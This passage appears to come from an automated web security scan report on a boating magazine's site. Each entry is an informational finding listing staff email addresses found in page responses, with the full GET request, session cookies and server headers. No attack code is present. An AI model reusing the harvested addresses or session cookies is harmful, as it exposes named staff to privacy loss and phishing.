
Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /boat-shop HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.392. http://www.soundingsonline.com/boat-shop/know-how

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /boat-shop/know-how HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.393. http://www.soundingsonline.com/boat-shop/new-boats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /boat-shop/new-boats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.394. http://www.soundingsonline.com/boat-shop/new-gear

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /boat-shop/new-gear HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.395. http://www.soundingsonline.com/boat-shop/on-powerboats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /boat-shop/on-powerboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.396. http://www.soundingsonline.com/boat-shop/on-sailboats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /boat-shop/on-sailboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.397. http://www.soundingsonline.com/boat-shop/q-a-a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /boat-shop/q-a-a HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.398. http://www.soundingsonline.com/boat-shop/sea-savvy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /boat-shop/sea-savvy HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.399. http://www.soundingsonline.com/boat-shop/tech-talk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /boat-shop/tech-talk HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.400. http://www.soundingsonline.com/boat-shop/used-boat-review

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /boat-shop/used-boat-review HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.401. http://www.soundingsonline.com/calendar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /calendar HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.402. http://www.soundingsonline.com/career-opportunities

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com
  • s.jylkka@soundingspub.com

Request

GET /career-opportunities HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:s.jylkka@soundingspub.com">
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.403. http://www.soundingsonline.com/columns-blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /columns-blogs HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.404. http://www.soundingsonline.com/columns-blogs/bay-tripper

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /columns-blogs/bay-tripper HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.405. http://www.soundingsonline.com/columns-blogs/books

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /columns-blogs/books HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.406. http://www.soundingsonline.com/columns-blogs/new-england-fishing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The following email addresses were disclosed in the response:
  • e.cirillo@soundingspub.com
  • info@soundingspub.com

Request

GET /columns-blogs/new-england-fishing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
